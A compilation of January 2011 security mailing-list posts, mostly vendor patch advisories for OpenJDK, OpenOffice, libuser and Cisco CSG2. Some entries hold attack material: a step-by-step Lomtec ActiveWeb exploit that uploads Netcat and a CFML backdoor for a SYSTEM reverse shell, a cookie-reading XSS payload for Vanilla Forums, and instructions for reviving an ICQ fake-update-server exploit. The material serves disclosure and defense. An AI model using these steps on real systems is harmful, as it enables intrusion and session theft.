[USN-1052-1] OpenJDK vulnerability
=== Ubuntu Security Notice USN-1052-1 January 26, 2011 openjdk-6, openjdk-6b18 vulnerability CVE-2010-4351 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: icedtea6-plugin 6b20-1.9.4-0ubuntu1~9.10.1 Ubuntu 10.04 LTS: icedtea6-plugin 6b20-1.9.4-0ubuntu1~10.04.1 Ubuntu 10.10: icedtea6-plugin 6b20-1.9.4-0ubuntu1 After a standard system update you need to restart any Java services, applications or applets to make all the necessary changes. Details follow: It was discovered that the JNLP SecurityManager in IcedTea for Java OpenJDK in some instances failed to properly apply the intended scurity policy in its checkPermission method. This could allow an attacker execute code with privileges that should have been prevented. (CVE-2010-4351) Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b20-1.9.4-0ubuntu1~9.10.1.diff.gz Size/MD5: 130597 b695702ffabdff2b295120905ba07780 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b20-1.9.4-0ubuntu1~9.10.1.dsc Size/MD5: 3018 3a15ba89ac3d8ec43057f1b4ee263084 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b20-1.9.4.orig.tar.gz Size/MD5: 73205024 b8a99377ee01bc543e73c21caba0e16d http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.4-0ubuntu1~9.10.1.diff.gz Size/MD5: 145537 250716e800eb500cc236ef9e3d6ddfe8 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.4-0ubuntu1~9.10.1.dsc Size/MD5: 2997 dfa9f1ba1c76ff9792ce88f8176aadd4 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.4.orig.tar.gz Size/MD5: 71375187 36e126c797818b9385d8ac48136782de Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b20-1.9.4-0ubuntu1~9.10.1_all.deb Size/MD5: 19978228 422aad6ce9714e8d521f054f005a5c2e http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b20-1.9.4-0ubuntu1~9.10.1_all.deb Size/MD5: 6168100 92e1760d6f8727947750fad6a05a8d38 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b20-1.9.4-0ubuntu1~9.10.1_all.deb Size/MD5: 26856742 2ab559527abf492ca1db334e09e0052a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5: 432714 06150a87d0deb18514098c4fd4d914c5 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5:83638 697efc67d953f29ecdfe2d02452edb70 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5: 119549160 f846ad33ad1efcad3a08d8f64f334b3a http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5: 2364520 194534ae02377afe4b7667743ba6dbac http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5: 10860680 04143fe33c016f8178f9303bc188e286 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5: 25605026 ef8eb5491f617666154924cd115367ee http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5: 270650 c228dc2ad44c587c1b3f10e9064bbd98 http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-jre-zero_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb Size/MD5: 5569110 a277a5d2676e1d2c045b03c087bbedf0 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb Size/MD5: 417736 0e878b1628c73c7c99f28f1eb151ca3c http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb Size/MD5:79226 4383c7addee3d356603e0837bd8edd34 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb Size/MD5: 172916362 568b5697863394351ccecdec006c23cf http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb Size/MD5: 2351096 6e3bfaaf5c310cfb46b4a1c7d1d10fdf http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-
HTB22796: Path disclousure in DBHcms
Vulnerability ID: HTB22796 Reference: http://www.htbridge.ch/advisory/path_disclousure_in_dbhcms.html Product: DBHcms Vendor: Kai-Sven Bunk ( http://www.drbenhur.com/ ) Vulnerable Version: Vendor Notification: 13 January 2011 Vulnerability Type: Path disclosure Status: Awaiting Vendor Response Risk level: Low Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "/dbhcms/ext/news/ext.news.settings.php" script, it's possible to generate an error that will reveal the full path of the script. A remote user can determine the full path to the web root directory and other potentially sensitive information. http://host/dbhcms/ext/news/ext.news.settings.php
Lomtec ActiveWeb Professional 3.0 CMS Allows Arbitrary File Upload and Execution as SYSTEM in ColdFusion (2010-WEB-002) (CERT VU#528212)
- www.ExploitDevelopment.com 2010-WEB-002 (CERT VU#870532) (Security Focus BID 45985) - TITLE: Lomtec ActiveWeb Professional 3.0 CMS Allows Arbitrary File Upload and Execution as SYSTEM in ColdFusion SUMMARY AND IMPACT: The ActiveWeb Professional 3.0 web content management server is vulnerable to remote operating system takeover. An unauthenticated remote user can upload malicious files and backdoor ColdFusion websites using the EasyEdit.cfm page. By accessing the "getImagefile" section of the EasyEdit module, the remote attacker can change hidden form fields to upload malicious applications and ColdFusion CFML websites that execute those malicious applications or operating system commands in the context of the ColdFusion service account (SYSTEM). The remote user can now perform all functions of the system administrator using uploaded CFML pages. The attacker can create a SYSTEM level shell connection back to the attacker's computer, add local administrator accounts, gather information about the victim company's network or set up a sniffer to capture passwords. Other pages on the ActiveWeb Professional CMS allow unauthenticated users to perform directory listings of the entire Microsoft Windows operating system. DETAILS: Use the following steps to exploit this vulnerability. Step 1: Access the ActiveWeb Get Image File Module. http://VICTIMIP/activeweb/EasyEdit.cfm?module=EasyEdit&page=getimagefile&Filter= Step 2: Using Mozilla FireFox with the Web Developer Toolbar, change the UploadDirectory hidden form field to C:\. Change the Accepted Extensions hidden form field to exe. Now you can upload the malicious application (Example would be Netcat.exe). Step 3: Using Mozilla FireFox with the Web Developer Toolbar, change the UploadDirectory hidden form field to c:\activeweb\activeweb\wwwroot\. Change the Accepted Extensions hidden form field to cfml. Upload your backdoor NetCat.cfml ColdFusion page that calls CFEXECUTE to run the malicious application. Step 4: Using Netcat.exe on the attacker's machine, listen for the VICTIM server's remote shell. Step 5: Using Mozilla FireFox, access the newly uploaded NetCat.cfml backdoor page via http://VICTIMIP/activeweb/NetCat.cfml. Step 6: You will now get a remote shell on your NetCat listener running as the ColdFusion service account (Default is SYSTEM on Microsoft Windows). VULNERABLE PRODUCTS: Lomtec ActiveWeb Professional 3.0 REFERENCES AND ADDITIONAL INFORMATION: N/A CREDITS: StenoPlasma (at) ExploitDevelopment.com TIMELINE: Discovery: December 16, 2008 Vendor Notified: May 6, 2010 (No response from vendor) Vendor Notified Attempt 2: May 10, 2010 (No response from vendor) Vendor Notified Attempt 3: May 19, 2010 (No response from vendor) Vendor Fixed: N/A Vendor Notified of Disclosure: N/A Disclosure to CERT: December 2, 2010 CERT Published: January 25, 2011 VENDOR URL: http://www.lomtec.com ADVISORY URL: http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-002.html http://www.kb.cert.org/vuls/id/528212 http://www.securityfocus.com/bid/45985/info VENDOR ADVISORY URL: N/A - StenoPlasma at ExploitDevelopment.com www.ExploitDevelopment.com -
HTB22797: Path disclousure in BLOG:CMS
Vulnerability ID: HTB22797 Reference: http://www.htbridge.ch/advisory/path_disclousure_in_blogcms.html Product: BLOG:CMS Vendor: Radek Hulán ( http://blogcms.com/ ) Vulnerable Version: 4.2.1.f and probably prior versions Vendor Notification: 13 January 2011 Vulnerability Type: Path disclousure Status: Not Fixed Risk level: Low Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "extras/postman/postman.php", "admin/plugins/NP_RSSAtomAggregator.php", "admin/plugins/NP_Newsfeed.php" scripts, it's possible to generate an error that will reveal the full path of the script. A remote user can determine the full path to the web root directory and other potentially sensitive information. http://host/extras/postman/postman.php http://host/admin/plugins/NP_RSSAtomAggregator.php http://host/admin/plugins/NP_Newsfeed.php
[SECURITY] [DSA 2151-1] New OpenOffice.org packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 2151-1secur...@debian.org http://www.debian.org/security/ Martin Schulze January 26th, 2011 http://www.debian.org/security/faq - -- Package: openoffice.org Vulnerability : several Problem type : local (remote) Debian-specific: no CVE ID : CVE-2010-3450 CVE-2010-3451 CVE-2010-3452 CVE-2010-3453 CVE-2010-3454 CVE-2010-3689 CVE-2010-4253 CVE-2010-4643 Several security related problems have been discovered in the OpenOffice.org package that allows malformed documents to trick the system into crashes or even the execution of arbitrary code. CVE-2010-3450 During an internal security audit within Red Hat, a directory traversal vulnerability has been discovered in the way OpenOffice.org 3.1.1 through 3.2.1 processes XML filter files. If a local user is tricked into opening a specially-crafted OOo XML filters package file, this problem could allow remote attackers to create or overwrite arbitrary files belonging to local user or, potentially, execute arbitrary code. CVE-2010-3451 During his work as a consultant at Virtual Security Research (VSR), Dan Rosenberg discovered a vulnerability in OpenOffice.org's RTF parsing functionality. Opening a maliciously crafted RTF document can caus an out-of-bounds memory read into previously allocated heap memory, which may lead to the execution of arbitrary code. CVE-2010-3452 Dan Rosenberg discovered a vulnerability in the RTF file parser which can be leveraged by attackers to achieve arbitrary code execution by convincing a victim to open a maliciously crafted RTF file. CVE-2010-3453 As part of his work with Virtual Security Research, Dan Rosenberg discovered a vulnerability in the WW8ListManager::WW8ListManager() function of OpenOffice.org that allows a maliciously crafted file to cause the execution of arbitrary code. CVE-2010-3454 As part of his work with Virtual Security Research, Dan Rosenberg discovered a vulnerability in the WW8DopTypography::ReadFromMem() function in OpenOffice.org that may be exploited by a maliciously crafted file which allowins an attacker to control program flow and potentially execute arbitrary code. CVE-2010-3689 Dmitri Gribenko discovered that the soffice script does not treat an empty LD_LIBRARY_PATH variable like an unset one, may lead to the execution of arbitrary code. CVE-2010-4253 A heap based buffer overflow has been discovered with unknown impact. CVE-2010-4643 A vulnerability has been discovered in the way OpenOffice.org handles TGA graphics which can be tricked by a specially crafted TGA file that could cause the program to crash due to a heap-based buffer overflow with unknown impact. For the stable distribution (lenny) these problems have been fixed in version 2.4.1+dfsg-1+lenny11. For the upcoming stable distribution (squeeze) these problems have been fixed in version 3.2.1-11+squeeze1. For the unstable distribution (sid) these problems have been fixed in version 3.2.1-11+squeeze1. For the experimental distribution these problems have been fixed in version 3.3.0~rc3-1. We recommend that you upgrade your OpenOffice.org packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: [18]http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iD8DBQFNQEkOW5ql+IAeqTIRAp9GAJ0WTb4z3fzW9x3TK3aux2v/zWtIPQCfRdzx +AX/hG1qBThFdf0f6k2SiMQ= =O7sd -END PGP SIGNATURE-
OpenOffice.org Multiple Memory Corruption Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: OpenOffice.org Multiple Memory Corruption Vulnerabilities Release Date: 2011-01-26 Application: Oracle OpenOffice.org Versions: 3.2 and earlier Severity: High Author: Dan Rosenberg Vendor Status: Patch Released CVE Candidates: CVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454 Reference: http://www.vsecurity.com/resources/advisory/20110126-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: "OpenOffice.org 3 is the leading open-source office software suite for word processing, spreadsheets, presentations, graphics, databases and more. It is available in many languages and works on all common computers. It stores all your data in an international open standard format and can also read and write files from other common office software packages. It can be downloaded and used completely free of charge for any purpose." Vulnerability Overview - -- On August 20th, VSR identified multiple memory corruption vulnerabilities in OpenOffice.org. By convincing a victim to open a maliciously crafted RTF or Word document, arbitrary code may be executed on the victim's machine. Vulnerability Details - - CVE-2010-3451: OpenOffice.org uses its own internal memory management system for parsing tables in RTF documents. Information about each table row is inserted, element by element, into an SwTableBoxes object. These objects contain a fixed amount of data, and when they have reached capacity, a resize() method is called to double the space previously allocated for cell contents. When this method is called, the new space will be allocated on top of recently freed memory containing file data without clearing this memory. Because of a bug in the RTF parser, corrupt table data may cause the insertion of elements into an SwTableBoxes object to skip an index rather than remaining strictly sequential. When this occurs, the nA field, representing the number of data elements used in the object, will be out-of-sync with the index of the most recently inserted element, allowing exploitation of a use-after-free vulnerability. To exploit this issue, corrupt RTF table data first causes the nA field to become out-of-sync with the index of the most recently inserted element in an SwTableBoxes object. Next, the resize() method is called when the object reaches capacity, resulting in its data being reallocated on top of attacker-controlled memory. Finally, during the parsing of an RTF_ROW token, the nA field is used to index into the SwTableBoxes cell data in an attempt to retrieve the most recently added object. Because this index is out-of-sync and the data was recently moved on top of previously used memory, this will result in retrieving an attacker-controlled object from the heap. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code. CVE-2010-3452: Due to a signedness error in parsing the \pnseclvl RTF tag, which is used for multi-level lists, it is possible to trigger a use-after-free vulnerability. When this tag is followed by an unexpected character, its token value may be negative. The parser attempts to restrict this value to less than the MAXLEVEL constant, but since a signed comparison is used, a negative value will pass this check. This value is then used as an index to retrieve an SwNumFmt object from an array on the heap. By manipulating the heap, it is possible to cause the retrieval of an attacker-controlled object. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code. CVE-2010-3453: When processing "override level numbers" in parsing list data for Word documents, a user-controlled value is used to index into a vector for an assignment without checking that this index is less than the size of the vector. As a result, an attacker-controlled object may be written to a location on the heap past the bounds of the vector, potentially allowing arbitrary code execution. CVE-2010-3454: When parsing Word documents, two signed short values are read directly from the document file to determine where to place NULL terminators after copying additional data in. Because these indexes are not checked in any way, an attacker may use this to write NULL bytes to two arbitrary locations in memory, potentially allowing arbitrary code execution. Versions Affected - - Versions prior to OpenOffice.org 3.3 are affected. Vendor Response - --- The following timeline details OpenOffice.org's response to the reported issues: 2010-08-20Initial report for CVE-2010-3452 20
Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities Advisory ID: cisco-sa-20110126-csg2 http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml Revision 1.0 For Public Release 2011 January 26 1600 UTC (GMT) +- Summary === A service policy bypass vulnerability exists in the Cisco Content Services Gateway - Second Generation (CSG2), which runs on the Cisco Service and Application Module for IP (SAMI). Under certain configurations this vulnerability could allow: * Customers to access sites that would normally match a billing policy to be accessed without being charged to the end customer * Customers to access sites that would normally be denied based on configured restriction policies Additionally, Cisco IOS Software Release 12.4(24)MD1 on the Cisco CSG2 contains two vulnerabilities that can be exploited by a remote, unauthenticated attacker to create a denial of service condition that prevents traffic from passing through the CSG2. These vulnerabilities require only a single content service to be active on the Cisco CSG2 and can be exploited via crafted TCP packets. A three-way handshake is not required to exploit either of these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml. Affected Products = The service policy bypass vulnerability affects all versions of the Cisco IOS Software for the CSG2 prior to the first fixed release, as indicated in the "Software Versions and Fixes" section of this advisory. The two denial of service vulnerabilities only affect Cisco IOS Software Release 12.4(24)MD1 on the Cisco CSG2. No other Cisco IOS Software releases are affected. Vulnerable Products +-- To determine the version of Cisco IOS Software that is running on the Cisco CSG2, issue the "show module" command from Cisco IOS Software on the switch on which the Cisco CSG2 module is installed to identify what modules and sub-modules are installed on the system. Cisco CSG2 runs on the Cisco Service and Application Module for IP (SAMI) card, and is identified in the following example in slot 2 via the WS-SVC-SAMI-BB-K9 identification: C7600#show module Mod Ports Card Type Model Serial No. --- - -- -- --- 12 Supervisor Engine 720 (Active) WS-SUP720-3BXL JAF1226ARQS 21 SAMI Module (csgk9)WS-SVC-SAMI-BB-K9 SAD113906P1 4 48 CEF720 48 port 10/100/1000mb Ethernet WS-X6748-GE-TX SAL1127T6XY Mod MAC addresses HwFw Sw Status --- -- -- --- 1 001e.be6e.a018 to 001e.be6e.a01b 5.6 8.5(2) 12.2(33)SRC5 Ok 2 001d.45f8.f3dc to 001d.45f8.f3e3 2.1 8.7(0.22)FW1 12.4(2010040 Ok 4 001c.587a.ef20 to 001c.587a.ef4f 2.6 12.2(14r)S5 12.2(33)SRC5 Ok Mod Sub-Module Model Serial Hw Status --- -- --- --- --- 1 Policy Feature Card 3 WS-F6K-PFC3BXL JAF1226BNQM 1.8Ok 1 MSFC3 Daughterboard WS-SUP720 JAF1226BNMC 3.1Ok 2 SAMI Daughterboard 1SAMI-DC-BB SAD114400L9 1.1 Other 2 SAMI Daughterboard 2SAMI-DC-BB SAD114207FU 1.1 Other 4 Centralized Forwarding Card WS-F6700-CFC SAL1029VGFK 2.0Ok Mod Online Diag Status --- 1 Pass 2 Pass 4 Pass C7600# After locating the correct slot, issue the "session slot processor <3-9>" command to open a console connection to the respective Cisco CSG2. Once connected to the Cisco CSG2, perform the "show version" command: The following example shows that the Cisco CSG2 is running software Release 12.4(24)MD1: CSG2#show version Cisco IOS Software, SAMI Software (SAMI-CSGK9-M), Version 12.4(24)MD1, RELEASE SOFTWARE (fc2) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems, Inc. Compiled Wed 07-Apr-10 09:50 by prod_rel_team --- output truncated --- Products Confirmed Not Vulnerable + The Cisco Content Services Gateway - 1st Generation (CSG) is not affected by these vulnerabilities. No other Cisco products are currently known to be affected by these vulnerabilities. Details === The Cisco Content Services Gateway - Second Generation (CSG2) provides intelligent network capabilities such as flexible policy management and billing based on deep-packet inspecti
Huawei HG default WEP/WPA generator
Hi, Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. The following documents detail the process of developing a key generator for these devices. English: http://websec.ca/blog/view/mac2wepkey_huawei Español: http://websec.mx/blog/ver/mac2wepkey_huawei
Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability
== Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability == 1. OVERVIEW The Vanilla Forums 2.0.16 and lower versions were vulnerable to Cross Site Scripting. 2. BACKGROUND Vanilla Forums are open-source, standards-compliant, customizable discussion forums. It is specially made to help small communities grow larger through SEO mojo, totally customizable social tools, and great user experience. Vanilla is also built with integration at the forefront, so it can seamlessly integrate with your existing website, blog, or custom-built application. 3. VULNERABILITY DESCRIPTION The 'Target' parameter was not properly sanitized after user logs in, which allows attacker to conduct Cross Site Scripting attack. An attacker could prepare a link in a forum post that includes a link to a file which seems to require authentication. Upon logging in, user will get XSSed. 4. VERSIONS AFFECTED 2.0.16 and lower 5. PROOF-OF-CONCEPT/EXPLOIT http://vanilla/index.php?p=/entry/signin&Target=javascript:alert(document.cookie)//http:// 6. SOLUTION Upgrade to Vanilla Forums 2.0.17 or higher 7. VENDOR Vanilla Forums Development Team http://vanillaforums.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-14: notified vendor 2011-01-18: vendor released fix 2011-01-27: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.16]_cross_site_scripting What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-01-27] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd
IETF RFC on "the implementation of the TCP urgent mechanism"
Folks, RFC 6093, entitled "On the Implementation of the TCP Urgent Mechanism" has just been published. It is available at: http://www.rfc-editor.org/rfc/rfc6093.txt This RFC has been motivated, to a large extent, by the behavior of some well-known firewalls. The Abstract of the RFC is: cut here This document analyzes how current TCP implementations process TCP urgent indications and how the behavior of some widely deployed middleboxes affects how end systems process urgent indications. This document updates the relevant specifications such that they accommodate current practice in processing TCP urgent indications, raises awareness about the reliability of TCP urgent indications in the Internet, and recommends against the use of urgent indications (but provides advice to applications that do). cut here More informantion about this and other related issues is available at my web site: http://www.gont.com.ar Thanks! Best regards, -- Fernando Gont e-mail: ferna...@gont.com.ar || fg...@acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1
[ MDVSA-2011:019 ] libuser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:019 http://www.mandriva.com/security/ ___ Package : libuser Date: January 26, 2011 Affected: 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in libuser: libuser before 0.57 uses a cleartext password value of (1) !! or (2) x for new LDAP user accounts, which makes it easier for remote attackers to obtain access by specifying one of these values (CVE-2011-0002). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0002 ___ Updated Packages: Mandriva Linux 2009.0: ca70c36b0b0d92777fd018d6f3cdd6e2 2009.0/i586/libuser-0.56.9-2.1mdv2009.0.i586.rpm 43123c3c58d55604307834fd7ada929c 2009.0/i586/libuser1-0.56.9-2.1mdv2009.0.i586.rpm f3cfd126ba0c48a73462950fc50588de 2009.0/i586/libuser-devel-0.56.9-2.1mdv2009.0.i586.rpm fa5bb059a1d0dd7d58b1d7057e5c0f7f 2009.0/i586/libuser-ldap-0.56.9-2.1mdv2009.0.i586.rpm 508e8b5bb1fd7e40f078842198f0f7e3 2009.0/i586/libuser-python-0.56.9-2.1mdv2009.0.i586.rpm 6195ca448d84b938fe21d1f2edf1378f 2009.0/SRPMS/libuser-0.56.9-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 7c97f6e1a82f6674873388e6c2ccb235 2009.0/x86_64/lib64user1-0.56.9-2.1mdv2009.0.x86_64.rpm 37abe1149c3e6e602cfd1e9621e03e82 2009.0/x86_64/lib64user-devel-0.56.9-2.1mdv2009.0.x86_64.rpm 5e46fc7dd4d31d6a05f221b14899109c 2009.0/x86_64/libuser-0.56.9-2.1mdv2009.0.x86_64.rpm 8a5e9ae3b52cca038070b411eb38b870 2009.0/x86_64/libuser-ldap-0.56.9-2.1mdv2009.0.x86_64.rpm f42063e6d27cad1685d9b66021e8328e 2009.0/x86_64/libuser-python-0.56.9-2.1mdv2009.0.x86_64.rpm 6195ca448d84b938fe21d1f2edf1378f 2009.0/SRPMS/libuser-0.56.9-2.1mdv2009.0.src.rpm Mandriva Linux 2010.0: 1390c942454ebf498ce5567283850e7e 2010.0/i586/libuser-0.56.11-1.1mdv2010.0.i586.rpm 054618569e80a6e1767d5e6529399d23 2010.0/i586/libuser1-0.56.11-1.1mdv2010.0.i586.rpm 1190320b655c4187f7fded7db74faed3 2010.0/i586/libuser-devel-0.56.11-1.1mdv2010.0.i586.rpm ba9f0a4af374c840a953de2ac46c80fb 2010.0/i586/libuser-ldap-0.56.11-1.1mdv2010.0.i586.rpm 41cc3b8d5a823e4a704cfb282fa9c76a 2010.0/i586/libuser-python-0.56.11-1.1mdv2010.0.i586.rpm 2694df315cb32a260064d024722beec9 2010.0/SRPMS/libuser-0.56.11-1.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 85d05e42080e8ad098261b7f10626f1a 2010.0/x86_64/lib64user1-0.56.11-1.1mdv2010.0.x86_64.rpm e2f2f311c3e00680b68f40e5189f4b3f 2010.0/x86_64/lib64user-devel-0.56.11-1.1mdv2010.0.x86_64.rpm 491f4e0c92f99e68ab2ba60dd969e10d 2010.0/x86_64/libuser-0.56.11-1.1mdv2010.0.x86_64.rpm f63768ddb727e3bf9b201756747e4f5e 2010.0/x86_64/libuser-ldap-0.56.11-1.1mdv2010.0.x86_64.rpm 74fa01df91da0fd1b9d37a7bcd91116d 2010.0/x86_64/libuser-python-0.56.11-1.1mdv2010.0.x86_64.rpm 2694df315cb32a260064d024722beec9 2010.0/SRPMS/libuser-0.56.11-1.1mdv2010.0.src.rpm Mandriva Linux 2010.1: 5c942ad8edeaea55a2091479838f602f 2010.1/i586/libuser-0.56.15-3.1mdv2010.2.i586.rpm 6f3c60d4bdc1acb67a5ac4e4593c7610 2010.1/i586/libuser1-0.56.15-3.1mdv2010.2.i586.rpm 191f919d23e87ed4108691778c34f082 2010.1/i586/libuser-devel-0.56.15-3.1mdv2010.2.i586.rpm b89cb7b101b523807d5b78aba657a724 2010.1/i586/libuser-ldap-0.56.15-3.1mdv2010.2.i586.rpm 1d6e2b68af335fc1ad493d96854d3df9 2010.1/i586/libuser-python-0.56.15-3.1mdv2010.2.i586.rpm 9e651f9eeb0978d060ad26e254c11b64 2010.1/SRPMS/libuser-0.56.15-3.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 45205a3cf4cf90c8fc45bfb5b3f544ed 2010.1/x86_64/lib64user1-0.56.15-3.1mdv2010.2.x86_64.rpm b90aab76a88221ed42dfa51272294d91 2010.1/x86_64/lib64user-devel-0.56.15-3.1mdv2010.2.x86_64.rpm 8c1dbfacfe98699d30d1b6c3e83b966e 2010.1/x86_64/libuser-0.56.15-3.1mdv2010.2.x86_64.rpm 68294d567786b431654d1b7ec0850214 2010.1/x86_64/libuser-ldap-0.56.15-3.1mdv2010.2.x86_64.rpm 1b12f17a64c7df7840fbd81f8657c979 2010.1/x86_64/libuser-python-0.56.15-3.1mdv2010.2.x86_64.rpm 9e651f9eeb0978d060ad26e254c11b64 2010.1/SRPMS/libuser-0.56.15-3.1mdv2010.2.src.rpm Corporate 4.0: 9070225e84b5ec4c97728927d58b9434 corporate/4.0/i586/libuser-0.53.2-6.1.20060mlcs4.i586.rpm 3fca7372f85b38bfb55a9e1e10c75ec0 corporate/4.0/i586/libuser1-0.53.2-6.1.20060mlcs4.i586.rpm 7ffeb054b227ea45e44bacbcd7438a53 corporate/4.0/i586/libuser
Re: Remote Code Execution in ICQ 7
UPDATE:
This week, ICQ 7.4 (build 4561) was released. Even though the original
version of my exploit does not work anymore, the vulnerability was not
resolved: ICQ only changed the product ID that is included in the path
to the update file. If every ocurrence of "30009" in both python files
(see original announcement below) is replaced by "30011" and afterwards,
a new update.xml is generated using build_update_files.py, the attack
will still succeed.
Note to ICQ engineers if they're reading this: To really fix the issue,
introduce cryptographically signed update files.
- Daniel Seither
On 14.01.2011 13:18, Daniel Seither wrote:
> SUMMARY
>
> The ICQ 7 instant messaging client allows remote code execution due to a
> flaw in its automatic update mechanism.
>
>
> VULNERABLE APPLICATIONS
>
> All versions of ICQ 7 for Windows, up to version 7.2, build 3525 (which
> is the current version)
>
> ICQ 6 and older versions were not tested.
>
> Other ICQ clients should not be affected since this is a flaw in the ICQ
> software update mechanism and not in the ICQ IM protocol.
>
>
> DETAILS
>
> ICQ 7 does not check the identity of the update server or the
> authenticity of the updates that it downloads through its automatic
> update mechanism. By impersonating the update server (think DNS
> spoofing), an attacker can act as an update server of its own and
> deliver arbitrary files that are executed on the next launch of the ICQ
> client. Since ICQ is automatically launched right after booting Windows
> by default and it checks for updates on every start, it can be attacked
> very reliably.
>
>
> REPRODUCING
>
> (1) Create the files for the update server (see below,
> build_update_files.py)
>
> (2) Run a fake update server (see below, run_update_server.py)
>
